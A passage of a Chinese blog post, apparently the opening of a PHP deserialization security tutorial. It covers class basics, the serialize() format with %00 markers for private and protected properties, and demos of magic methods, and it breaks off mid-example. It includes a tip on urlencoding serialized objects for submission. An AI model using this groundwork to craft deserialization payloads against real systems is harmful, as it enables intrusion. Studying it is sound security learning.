{"id":67,"date":"2026-01-22T23:14:39","date_gmt":"2026-01-22T15:14:39","guid":{"rendered":"https:\/\/zhihao.org.cn\/?p=67"},"modified":"2026-01-22T23:40:35","modified_gmt":"2026-01-22T15:40:35","slug":"%e6%b7%b1%e5%85%a5%e6%8e%a2%e7%b4%a2-php-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e4%b8%8e%e9%ad%94%e6%9c%af%e6%96%b9%e6%b3%95","status":"publish","type":"post","link":"https:\/\/zhihao.org.cn\/?p=67","title":{"rendered":"\u6df1\u5165\u63a2\u7d22 PHP \u53cd\u5e8f\u5217\u5316\u4e0e\u9b54\u672f\u65b9\u6cd5"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\" id=\"kOpjv\"><strong>\u7c7b\u4e0e\u5bf9\u8c61<\/strong><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"yZZZ4\">php\u9762\u5411\u5bf9\u8c61\u5f00\u53d1\u7684\u5185\u5bb9<\/h4>\n\n\n\n<p id=\"ue0718492\"><strong>\u7c7b<\/strong> \u2212 \u5b9a\u4e49\u4e86\u4e00\u4ef6\u4e8b\u7269\u7684\u62bd\u8c61\u7279\u70b9\u3002\u7c7b\u7684\u5b9a\u4e49\u5305\u542b\u4e86\u6570\u636e\u7684\u5f62\u5f0f\u4ee5\u53ca\u5bf9\u6570\u636e\u7684\u64cd\u4f5c\u3002<\/p>\n\n\n\n<p id=\"u5ac17eb8\"><strong>\u5bf9\u8c61<\/strong> \u2212 \u662f\u7c7b\u7684\u5b9e\u4f8b\u3002<\/p>\n\n\n\n<p id=\"ue47b95b9\"><strong>\u6210\u5458\u53d8\u91cf<\/strong> \u2212 \u5b9a\u4e49\u5728\u7c7b\u5185\u90e8\u7684\u53d8\u91cf\u3002\u8be5\u53d8\u91cf\u7684\u503c\u5bf9\u5916\u662f\u4e0d\u53ef\u89c1\u7684\uff0c\u4f46\u662f\u53ef\u4ee5\u901a\u8fc7\u6210\u5458\u51fd\u6570\u8bbf\u95ee\uff0c\u5728\u7c7b\u88ab\u5b9e\u4f8b\u5316\u4e3a\u5bf9\u8c61\u540e\uff0c\u8be5\u53d8\u91cf\u5373\u53ef\u6210\u4e3a\u5bf9\u8c61\u7684\u5c5e\u6027\u3002<\/p>\n\n\n\n<p id=\"u097b0387\"><strong>\u6210\u5458\u51fd\u6570<\/strong> \u2212 \u5b9a\u4e49\u5728\u7c7b\u7684\u5185\u90e8\uff0c\u53ef\u7528\u4e8e\u8bbf\u95ee\u5bf9\u8c61\u7684\u6570\u636e\u3002<\/p>\n\n\n\n<p id=\"uff02d78f\"><strong>\u7ee7\u627f<\/strong> \u2212 
\u7ee7\u627f\u6027\u662f\u5b50\u7c7b\u81ea\u52a8\u5171\u4eab\u7236\u7c7b\u6570\u636e\u7ed3\u6784\u548c\u65b9\u6cd5\u7684\u673a\u5236\uff0c\u8fd9\u662f\u7c7b\u4e4b\u95f4\u7684\u4e00\u79cd\u5173\u7cfb\u3002\u5728\u5b9a\u4e49\u548c\u5b9e\u73b0\u4e00\u4e2a\u7c7b\u7684\u65f6\u5019\uff0c\u53ef\u4ee5\u5728\u4e00\u4e2a\u5df2\u7ecf\u5b58\u5728\u7684\u7c7b\u7684\u57fa\u7840\u4e4b\u4e0a\u6765\u8fdb\u884c\uff0c\u628a\u8fd9\u4e2a\u5df2\u7ecf\u5b58\u5728\u7684\u7c7b\u6240\u5b9a\u4e49\u7684\u5185\u5bb9\u4f5c\u4e3a\u81ea\u5df1\u7684\u5185\u5bb9\uff0c\u5e76\u52a0\u5165\u82e5\u5e72\u65b0\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n<p id=\"u207b0a61\"><strong>\u7236\u7c7b<\/strong> \u2212 \u4e00\u4e2a\u7c7b\u88ab\u5176\u4ed6\u7c7b\u7ee7\u627f\uff0c\u53ef\u5c06\u8be5\u7c7b\u79f0\u4e3a\u7236\u7c7b\uff0c\u6216\u57fa\u7c7b\uff0c\u6216\u8d85\u7c7b\u3002<\/p>\n\n\n\n<p id=\"u40a1826b\"><strong>\u5b50\u7c7b<\/strong> \u2212 \u4e00\u4e2a\u7c7b\u7ee7\u627f\u5176\u4ed6\u7c7b\u79f0\u4e3a\u5b50\u7c7b\uff0c\u4e5f\u53ef\u79f0\u4e3a\u6d3e\u751f\u7c7b\u3002<\/p>\n\n\n\n<p id=\"uff580e90\"><strong>\u6784\u9020\u51fd\u6570<\/strong> \u2212 \u4e3b\u8981\u7528\u6765\u5728\u521b\u5efa\u5bf9\u8c61\u65f6\u521d\u59cb\u5316\u5bf9\u8c61\uff0c \u5373\u4e3a\u5bf9\u8c61\u6210\u5458\u53d8\u91cf\u8d4b\u521d\u59cb\u503c\uff0c\u603b\u4e0enew\u8fd0\u7b97\u7b26\u4e00\u8d77\u4f7f\u7528\u5728\u521b\u5efa\u5bf9\u8c61\u7684\u8bed\u53e5\u4e2d\u3002<\/p>\n\n\n\n<p id=\"u8bf99cea\"><strong>\u6790\u6784\u51fd\u6570<\/strong> \u2212 \u6790\u6784\u51fd\u6570(destructor) \u4e0e\u6784\u9020\u51fd\u6570\u76f8\u53cd\uff0c\u5f53\u5bf9\u8c61\u7ed3\u675f\u5176\u751f\u547d\u5468\u671f\u65f6\uff08\u4f8b\u5982\u5bf9\u8c61\u6240\u5728\u7684\u51fd\u6570\u5df2\u8c03\u7528\u5b8c\u6bd5\uff09\uff0c\u7cfb\u7edf\u81ea\u52a8\u6267\u884c\u6790\u6784\u51fd\u6570\u3002\u6790\u6784\u51fd\u6570\u5f80\u5f80\u7528\u6765\u505a&#8221;\u6e05\u7406\u5584\u540e&#8221; 
\u7684\u5de5\u4f5c\uff08\u4f8b\u5982\u5728\u5efa\u7acb\u5bf9\u8c61\u65f6\u7528new\u5f00\u8f9f\u4e86\u4e00\u7247\u5185\u5b58\u7a7a\u95f4\uff0c\u5e94\u5728\u9000\u51fa\u524d\u5728\u6790\u6784\u51fd\u6570\u4e2d\u7528delete\u91ca\u653e\uff09\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"BCpGm\">\u7c7b\u7684\u6f14\u793a<\/h4>\n\n\n\n<p id=\"uaff9aca3\">\u7c7b\uff1a\u5b9a\u4e49\u7c7b\u540d\u3001\u5b9a\u4e49\u6210\u5458\u53d8\u91cf\uff08\u5c5e\u6027\uff09\u3001\u5b9a\u4e49\u6210\u5458\u51fd\u6570\uff08\u65b9\u6cd5<\/p>\n\n\n\n<pre id=\"H5uBW\" class=\"wp-block-code\"><code>&lt;?php\nclass hero{\n  var $name;\n  var $sex;\n  function jineng($var1) {\n    echo $this-&gt;name;\n    echo $var1;\n  }\n}\n?&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"DYtov\">\u5b9e\u4f8b\u5316\u548c\u8d4b\u503c<\/h4>\n\n\n\n<p id=\"u518c72ef\">\u5b9e\u4f8b\u5316\u548c\u8d4b\u503c\uff0c\u6f14\u793a\u4ee3\u7801<\/p>\n\n\n\n<pre id=\"rfNyh\" class=\"wp-block-code\"><code>&lt;?php\nclass hero{\n  var $name;\n  var $sex;\n  function jineng($var1) {\n    echo $this-&gt;name.\"&lt;br \/&gt;\";\n    echo $var1.\"&lt;br \/&gt;\";\n    }\n}\n$cyj= new hero();\n$cyj-&gt;name='chengyaojin';\n$cyj-&gt;sex='man';\n$cyj-&gt;jineng('zuofan');\nprint_r($cyj);\n?&gt;\n&lt;!-- chengyaojin\nzuofan\nhero Object ( &#91;name] =&gt; chengyaojin &#91;sex] =&gt; man )\t \t\t\t --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"uwXBN\">\u6743\u9650\u4fee\u9970\u7b26<\/h4>\n\n\n\n<p id=\"u2816ab5e\">PHP\u8bbf\u95ee\u6743\u9650\u4fee\u9970\u7b26\u6709\u4e09\u79cd\uff1a1\u3001Public\uff0c2\u3001Protected\uff0c3\u3001private<\/p>\n\n\n\n<pre id=\"k2lnK\" class=\"wp-block-code\"><code>&lt;?php\nclass hero{\n  public  $name='chengyaojin'; 
\/\/public\u4fee\u9970\u7b26\u662fPHP\u4e2d\u6700\u5e38\u7528\u7684\u6743\u9650\u63a7\u5236\u4fee\u9970\u7b26\uff0c\u7528\u4e8e\u63cf\u8ff0\u516c\u5171\u6210\u5458\u53d8\u91cf\u548c\u6210\u5458\u65b9\u6cd5\u3002\u5c06\u4e00\u4e2a\u6210\u5458\u53d8\u91cf\u6216\u65b9\u6cd5\u5b9a\u4e49\u4e3a\u516c\u5171\u7684\uff0c\u5219\u4efb\u4f55\u5bf9\u8c61\u90fd\u53ef\u4ee5\u8bbf\u95ee\u8be5\u53d8\u91cf\u6216\u65b9\u6cd5\u3002\n  private  $sex='man'; \/\/private\u4fee\u9970\u7b26\u7528\u4e8e\u63cf\u8ff0\u79c1\u6709\u7684\u6210\u5458\u53d8\u91cf\u548c\u6210\u5458\u65b9\u6cd5\u3002\u5c06\u4e00\u4e2a\u6210\u5458\u53d8\u91cf\u6216\u65b9\u6cd5\u5b9a\u4e49\u4e3a\u79c1\u6709\u7684\uff0c\u5219\u53ea\u6709\u8be5\u7c7b\u5185\u90e8\u53ef\u4ee5\u8bbf\u95ee\u8fd9\u4e9b\u6210\u5458\u3002\n  protected  $shengao='165';  \/\/protected\u4fee\u9970\u7b26\u7528\u4e8e\u63cf\u8ff0\u53d7\u4fdd\u62a4\u7684\u6210\u5458\u53d8\u91cf\u548c\u6210\u5458\u65b9\u6cd5\u3002\u5c06\u4e00\u4e2a\u6210\u5458\u53d8\u91cf\u6216\u65b9\u6cd5\u5b9a\u4e49\u4e3a\u53d7\u4fdd\u62a4\u7684\uff0c\u5219\u53ea\u6709\u5b50\u7c7b\u548c\u7236\u7c7b\u4e2d\u53ef\u4ee5\u8bbf\u95ee\u8fd9\u4e9b\u6210\u5458\u3002\n  function jineng($var1) {\n    echo $this-&gt;name;\n    echo $var1;\n    }\n}\n$cyj= new hero();\necho $cyj-&gt;name.\"&lt;br \/&gt;\";\necho $cyj-&gt;sex.\"&lt;br \/&gt;\";\necho $cyj-&gt;shengao.\"&lt;br \/&gt;\";\n?&gt;\n\n&lt;!-- chengyaojin --&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"vWoeR\"><strong>\u5e8f\u5217\u5316\u57fa\u7840\u77e5\u8bc6<\/strong><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"mQZUk\">\u5e8f\u5217\u5316\u6f14\u793a<\/h4>\n\n\n\n<p id=\"u049255b3\">\u4e0d\u540c\u6570\u636e\u7c7b\u578b\u5e8f\u5217\u5316\u4e4b\u540e\u5bf9\u7684\u683c\u5f0f\u5c55\u793a<\/p>\n\n\n\n<p 
id=\"u699554cd\">\u5bf9\u8c61\u7c7b\u578b:\u540d\u79f0\u957f\u5ea6:\u5bf9\u8c61\u540d\u79f0:\u5bf9\u8c61\u4e2a\u6570:{\u5c5e\u6027\u7c7b\u578b:\u5c5e\u6027\u957f\u5ea6:\u5c5e\u6027\u540d\u79f0;\u5185\u5bb9\u7c7b\u578b:\u5185\u5bb9\u957f\u5ea6:\u5185\u5bb9;}<\/p>\n\n\n\n<pre id=\"uCRo1\" class=\"wp-block-code\"><code>&lt;?php\nclass TEST {\n    public $data;\n    public $data2 = \"dazzhuang\";\n    private $pass;\n\n    public function __construct($data, $pass)\n    {\n        $this-&gt;data = $data;\n        $this-&gt;pass = $pass;\n    }\n}\n$number = 34;\n$str = 'user';\n$bool = true;\n$null = NULL;\n$arr = array('a' =&gt; 10, 'b' =&gt; 200);\n$test = new TEST('uu', true);\n$test2 = new TEST('uu', true);\n$test2-&gt;data = &amp;$test2-&gt;data2;\necho serialize($number).\"&lt;br \/&gt;\";\necho serialize($str).\"&lt;br \/&gt;\";\necho serialize($bool).\"&lt;br \/&gt;\";\necho serialize($null).\"&lt;br \/&gt;\";\necho serialize($arr).\"&lt;br \/&gt;\";\necho serialize($test).\"&lt;br \/&gt;\";\necho serialize($test2).\"&lt;br \/&gt;\";\n?&gt;\n&lt;!-- \ni:34;\ns:4:\"user\";\nb:1;\nN;\na:2:{s:1:\"a\";i:10;s:1:\"b\";i:200;}\nO:4:\"TEST\":3:{s:4:\"data\";s:2:\"uu\";s:5:\"data2\";s:9:\"dazzhuang\";s:10:\"TESTpass\";b:1;}\nO:4:\"TEST\":3:{s:4:\"data\";s:9:\"dazzhuang\";s:5:\"data2\";R:2;s:10:\"TESTpass\";b:1;} --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"yTJr0\">\u6570\u7ec4\u5e8f\u5217\u5316<\/h4>\n\n\n\n<pre id=\"u0u87\" class=\"wp-block-code\"><code>&lt;?php\n$a = array('benben','dazhuang','laoliu');\necho $a&#91;0];\necho serialize($a);\n?&gt;\n&lt;!-- benbena:3:{i:0;s:6:\"benben\";i:1;s:8:\"dazhuang\";i:2;s:6:\"laoliu\";} --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"WUNb8\">\u5bf9\u8c61\u5e8f\u5217\u5316<\/h4>\n\n\n\n<p id=\"uf47fc3f5\">\u63d0\u4f9b\u4e86\u5bf9\u8c61\u5e8f\u5217\u5316\u793a\u4f8b<\/p>\n\n\n\n<pre id=\"iZQtx\" class=\"wp-block-code\"><code>&lt;?php\nhighlight_file(__FILE__);\nclass test{\n    public 
$pub='benben';\n    function jineng(){\n        echo $this-&gt;pub;\n    }\n}\n$a = new test();\necho serialize($a);\n?&gt;\n&lt;!-- O:4:\"test\":1:{s:3:\"pub\";s:6:\"benben\";} --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"QdF8h\">\u79c1\u6709\u4fee\u9970\u7b26 private<\/h4>\n\n\n\n<p id=\"u8ee711ee\">\u79c1\u6709\u5c5e\u6027\u5728\u5e8f\u5217\u5316\u4e4b\u540e\u7684\u683c\u5f0f<\/p>\n\n\n\n<pre id=\"MlQbA\" class=\"wp-block-code\"><code>&lt;?php\nclass test{\n    private $pub='benben';\n    function jineng(){\n        echo $this-&gt;pub;\n    }\n}\n$a = new test();\necho serialize($a);\n?&gt;\n&lt;!-- O:4:\"test\":1:{s:9:\"testpub\";s:6:\"benben\";} --&gt;\n&lt;!-- \u5f53\u5c5e\u6027\u53d8\u91cf\u4e3aprivate\u548cprotected\u65f6\uff0c\u6700\u597d\u4f7f\u7528urlencode\u7f16\u7801\u4e00\u4e0b\uff0c\u56e0\u4e3a\u5e8f\u5217\u5316\u65f6\u4f1a\u5728\u5c5e\u6027\u540d\u79f0\u524d\u751f\u6210\u4e0d\u53ef\u89c1\u5b57\u7b26--&gt;<\/code><\/pre>\n\n\n\n<p id=\"u804e41bf\">private\u5e8f\u5217\u5316\u540e\u662f%00(\u7c7b\u540d)%00(\u53d8\u91cf\u540d)<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"kWjYF\">\u4fdd\u62a4\u4fee\u9970\u7b26 protected<\/h4>\n\n\n\n<p id=\"u81b91926\">\u4fdd\u62a4\u5c5e\u6027\u4fee\u9970\u7b26\u5728\u5e8f\u5217\u5316\u4e4b\u540e\u7684\u683c\u5f0f<\/p>\n\n\n\n<pre id=\"ydjvz\" class=\"wp-block-code\"><code>&lt;?php\nclass test{\n    protected $pub='benben';\n    function jineng(){\n        echo $this-&gt;pub;\n    }\n}\n$a = new test();\necho serialize($a);\n?&gt;\n&lt;!-- O:4:\"test\":1:{s:6:\"*pub\";s:6:\"benben\";} --&gt;<\/code><\/pre>\n\n\n\n<p id=\"u3493252d\">protected\u5e8f\u5217\u5316\u4e4b\u540e\u662f%00*%00(\u53d8\u91cf\u540d)<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"SJu90\">\u6210\u5458\u5c5e\u6027\u8c03\u7528\u5bf9\u8c61<\/h4>\n\n\n\n<p id=\"u75b9b000\">\u6f14\u793a\u6210\u5458\u5c5e\u6027\u8c03\u7528\u5bf9\u8c61\u8fc7\u7a0b\uff0c\u53ca\u5e8f\u5217\u5316\u4e4b\u540e\u683c\u5f0f\u89e3\u91ca<\/p>\n\n\n\n<pre id=\"A9ShY\" 
class=\"wp-block-code\"><code>&lt;?php\nclass test{\n    var $pub='benben';\n    function jineng(){\n        echo $this-&gt;pub;\n    }\n}\nclass test2{\n    var $ben;\n    function __construct(){\n        $this-&gt;ben=new test();\n    }\n}\n$a = new test2();\necho serialize($a);\n?&gt;\n&lt;!-- O:5:\"test2\":1:{s:3:\"ben\";O:4:\"test\":1:{s:3:\"pub\";s:6:\"benben\";}} --&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"sGZTz\"><strong>\u9b54\u672f\u65b9\u6cd5\u4ecb\u7ecd\uff0c\u6784\u9020\u548c\u6790\u6784<\/strong><\/h3>\n\n\n\n<p id=\"u1d0e8c08\">PHP\u4e2d\u628a\u4ee5\u4e24\u4e2a\u4e0b\u5212\u7ebf__\u5f00\u5934\u7684\u65b9\u6cd5\u79f0\u4e3a\u9b54\u672f\u65b9\u6cd5(Magic methods)\uff0c\u8fd9\u4e9b\u65b9\u6cd5\u5728PHP\u4e2d\u5145\u5f53\u4e86\u4e3e\u8db3\u8f7b\u91cd\u7684\u4f5c\u7528\u3002 \u9b54\u672f\u65b9\u6cd5\u5305\u62ec\uff1a<\/p>\n\n\n\n<pre id=\"iK1Jf\" class=\"wp-block-code\"><code>__construct()\uff0c\u7c7b\u7684\u6784\u9020\u51fd\u6570\n\n__destruct()\uff0c\u7c7b\u7684\u6790\u6784\u51fd\u6570\n\n__call()\uff0c\u5728\u5bf9\u8c61\u4e2d\u8c03\u7528\u4e00\u4e2a\u4e0d\u53ef\u8bbf\u95ee\u65b9\u6cd5\u65f6\u8c03\u7528\n\n__callStatic()\uff0c\u7528\u9759\u6001\u65b9\u5f0f\u4e2d\u8c03\u7528\u4e00\u4e2a\u4e0d\u53ef\u8bbf\u95ee\u65b9\u6cd5\u65f6\u8c03\u7528\n\n__get()\uff0c\u83b7\u5f97\u4e00\u4e2a\u7c7b\u7684\u6210\u5458\u53d8\u91cf\u65f6\u8c03\u7528\n\n__set()\uff0c\u8bbe\u7f6e\u4e00\u4e2a\u7c7b\u7684\u6210\u5458\u53d8\u91cf\u65f6\u8c03\u7528\n\n__isset()\uff0c\u5f53\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u7528isset()\u6216empty()\u65f6\u8c03\u7528\n\n__unset()\uff0c\u5f53\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u7528unset()\u65f6\u88ab\u8c03\u7528\u3002\n\n__sleep()\uff0c\u6267\u884cserialize()\u65f6\uff0c\u5148\u4f1a\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\n\n__wakeup()\uff0c\u6267\u884cunserialize()\u65f6\uff0c\u5148\u4f1a\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\n\n__toString()\uff0c\u7c7b\u88ab\u5f53\u6210\u5b57\u7b26\u4e32\u65f6\u7684\u56
de\u5e94\u65b9\u6cd5\n\n__invoke()\uff0c\u8c03\u7528\u51fd\u6570\u7684\u65b9\u5f0f\u8c03\u7528\u4e00\u4e2a\u5bf9\u8c61\u65f6\u7684\u56de\u5e94\u65b9\u6cd5\n\n__set_state()\uff0c\u8c03\u7528var_export()\u5bfc\u51fa\u7c7b\u65f6\uff0c\u6b64\u9759\u6001\u65b9\u6cd5\u4f1a\u88ab\u8c03\u7528\u3002\n\n__clone()\uff0c\u5f53\u5bf9\u8c61\u590d\u5236\u5b8c\u6210\u65f6\u8c03\u7528\n\n__autoload()\uff0c\u5c1d\u8bd5\u52a0\u8f7d\u672a\u5b9a\u4e49\u7684\u7c7b\n\n__debugInfo()\uff0c\u6253\u5370\u6240\u9700\u8c03\u8bd5\u4fe1\u606f<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"REwLi\">__construct()<\/h4>\n\n\n\n<p id=\"u537eedad\">\u6784\u9020\u51fd\u6570\uff0c\u5728\u5b9e\u4f8b\u5316\u4e00\u4e2a\u5bf9\u8c61\u7684\u65f6\u5019\uff0c\u9996\u5148\u4f1a\u53bb\u81ea\u52a8\u6267\u884c\u7684\u4e00\u4e2a\u65b9\u6cd5\uff0c\u5f53\u4f7f\u7528 new \u5173\u952e\u5b57\u5b9e\u4f8b\u5316\u4e00\u4e2a\u5bf9\u8c61\u65f6\uff0c\u6784\u9020\u51fd\u6570\u5c06\u4f1a\u81ea\u52a8\u8c03\u7528\u3002\uff1b<\/p>\n\n\n\n<pre id=\"djld0\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public $username;\n    public function __construct($username) {\n        $this-&gt;username = $username;\n        echo \"\u89e6\u53d1\u4e86\u6784\u9020\u51fd\u65701\u6b21\" ;\n    }\n}\n$test = new User(\"benben\"); \/\/\u8fd9\u91cc\u89e6\u53d1\n$ser = serialize($test);\nunserialize($ser);\n\n?&gt;\n\n&lt;!-- \u89e6\u53d1\u4e86\u6784\u9020\u51fd\u65701\u6b21 --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"EHivb\">__destruct()<\/h4>\n\n\n\n<p id=\"u7cd541f4\">\u6790\u6784\u51fd\u6570\uff0c\u5728\u5bf9\u8c61\u7684\u6240\u6709\u5f15\u7528\u88ab\u5220\u9664\u6216\u8005\u5f53\u5bf9\u8c61\u88ab\u663e\u5f0f\u9500\u6bc1\u65f6\u6267\u884c\u7684\u9b54\u672f\u65b9\u6cd5\u3002<\/p>\n\n\n\n<pre id=\"Qx5GC\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public function __destruct()\n    {\n        echo \"\u89e6\u53d1\u4e86\u6790\u6784\u51fd\u65701\u6b21\".\"&lt;br \/&gt;\" ;\n    }\n}\n$test = new 
User(\"benben\");\n$ser = serialize($test);\nunserialize($ser); \n\/\/\u8fd9\u91cc\u89e6\u53d1\n\n?&gt;\n&lt;!-- \u89e6\u53d1\u4e86\u6790\u6784\u51fd\u65701\u6b21\n\u89e6\u53d1\u4e86\u6790\u6784\u51fd\u65701\u6b21 --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"lcqix\">__sleep()<\/h4>\n\n\n\n<p id=\"ue004915c\">\u6b64\u529f\u80fd\u53ef\u4ee5\u7528\u4e8e\u6e05\u7406\u5bf9\u8c61\uff0c\u5e76\u8fd4\u56de\u4e00\u4e2a\u5305\u542b\u5bf9\u8c61\u4e2d\u6240\u6709\u5e94\u88ab\u5e8f\u5217\u5316\u7684\u53d8\u91cf\u540d\u79f0\u7684\u6570\u7ec4\u3002\u6267\u884cserialize()\u4e4b\u524d\uff0c\u5148\u4f1a\u89e6\u53d1\u8fd9\u4e2a\u51fd\u6570,session\u5e8f\u5217\u5316\u5199\u5165\u65f6\u4f1a\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"gRLAO\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    const SITE = 'uusama';\n    public $username;\n    public $nickname;\n    private $password;\n    public function __construct($username, $nickname, $password)    {\n        $this-&gt;username = $username;\n        $this-&gt;nickname = $nickname;\n        $this-&gt;password = $password;\n    }\n    public function __sleep() {\n        return array('username', 'nickname');\n    }\n}\n$user = new User('a', 'b', 'c');\n\/\/\u8fd9\u91cc\u89e6\u53d1\necho serialize($user);\n?&gt;\n\n&lt;!-- O:4:\"User\":2:{s:8:\"username\";s:1:\"a\";s:8:\"nickname\";s:1:\"b\";} --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"aO8PH\">__wakeup()<\/h4>\n\n\n\n<p id=\"u351176a2\">\u9884\u5148\u51c6\u5907\u5bf9\u8c61\u8d44\u6e90\uff0c\u8fd4\u56devoid\uff0c\u5e38\u7528\u4e8e\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\u4e2d\u91cd\u65b0\u5efa\u7acb\u6570\u636e\u5e93\u8fde\u63a5\u6216\u6267\u884c\u5176\u4ed6\u521d\u59cb\u5316\u64cd\u4f5c\u3002\u6267\u884cunserialize()\u65f6\uff0c\u5148\u4f1a\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570<\/p>\n\n\n\n<pre id=\"LcG6t\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    const SITE = 'uusama';\n    public $username;\n    public $nickname;\n    private 
$password;\n    private $order;\n    public function __wakeup() {\n        $this-&gt;password = $this-&gt;username;\n    }\n}\n$user_ser = 'O:4:\"User\":2:{s:8:\"username\";s:1:\"a\";s:8:\"nickname\";s:1:\"b\";}';\n\/\/\u8fd9\u91cc\u89e6\u53d1\nvar_dump(unserialize($user_ser));\n?&gt;\n&lt;!-- object(User)#1 (4) { &#91;\"username\"]=&gt; string(1) \"a\" &#91;\"nickname\"]=&gt; string(1) \"b\" &#91;\"password\":\"User\":private]=&gt; string(1) \"a\" &#91;\"order\":\"User\":private]=&gt; NULL } --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"GWwxk\">__toString()<\/h4>\n\n\n\n<p id=\"u80cdd3fd\">echo\u6216\u8005print\u53ea\u80fd\u8c03\u7528\u5b57\u7b26\u4e32\u7684\u65b9\u5f0f\u53bb\u8c03\u7528\u5bf9\u8c61\uff0c\u5373\u628a\u5bf9\u8c61\u5f53\u6210\u5b57\u7b26\u4e32\u4f7f\u7528\uff0c\u6b64\u65f6\u81ea\u52a8\u89e6\u53d1toString()\u3002\u628a\u7c7b\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1 echo\uff0c\u6b63\u5219\u5339\u914d\uff0c\u5b57\u7b26\u4e32\u62fc\u63a5\u7b49\u90fd\u4f1a\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"dFPEd\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    var $benben = \"this is test!!\";\n         public function __toString()\n         {\n             return '\u683c\u5f0f\u4e0d\u5bf9\uff0c\u8f93\u51fa\u4e0d\u4e86!';\n          }\n}\n$test = new User() ;\nprint_r($test);\necho \"&lt;br \/&gt;\";\necho $test; \/\/\u8fd9\u91cc\u89e6\u53d1\n?&gt;\n&lt;!-- User Object ( &#91;benben] =&gt; this is test!! )\n\u683c\u5f0f\u4e0d\u5bf9\uff0c\u8f93\u51fa\u4e0d\u4e86! 
--&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"j6bD5\">__invoke()<\/h4>\n\n\n\n<p id=\"u11fcd024\">\u628atest\u5f53\u6210\u51fd\u6570test()\u6765\u8c03\u7528,\u6b64\u65f6\u89e6\u53d1invoke()\u3002\u5f53\u5c1d\u8bd5\u5c06\u5bf9\u8c61\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"txe6g\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    var $benben = \"this is test!!\";\n         public function __invoke()\n         {\n             echo  '\u5b83\u4e0d\u662f\u4e2a\u51fd\u6570!';\n          }\n}\n$test = new User() ;\necho $test -&gt;benben;\necho \"&lt;br \/&gt;\";\necho $test() -&gt;benben;\/\/\u8fd9\u91cc\u89e6\u53d1\n?&gt;\nthis is test!!\n\u5b83\u4e0d\u662f\u4e2a\u51fd\u6570!<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"g5sTG\">__call()<\/h4>\n\n\n\n<p id=\"u48db3b18\">\u8c03\u7528\u7684\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u7684\u540d\u79f0\u548c\u53c2\u6570\uff0c\u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1 #$test-&gt;callxxx(&#8216;a&#8217;);<\/p>\n\n\n\n<pre id=\"FoSdE\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public function __call($arg1,$arg2)\n    {\n        echo \"$arg1,$arg2&#91;0]\";\n          }\n}\n$test = new User() ;\n$test -&gt; callxxx('a');\n?&gt;\n\n&lt;!-- callxxx,a --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"ZIK4h\">__callStatic()<\/h4>\n\n\n\n<p id=\"u730d0e4d\">\u9759\u6001\u8c03\u7528\u6216\u8c03\u7528\u6210\u5458\u5e38\u91cf\u65f6\u4f7f\u7528\u7684\u65b9\u6cd5\u4e0d\u5b58\u5728\uff0c\u5728\u9759\u6001\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1 #$test::callxxx(&#8216;a&#8217;);<\/p>\n\n\n\n<pre id=\"vJv4q\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public function __callStatic($arg1,$arg2)\n    {\n        echo \"$arg1,$arg2&#91;0]\";\n          }\n}\n$test = new User() 
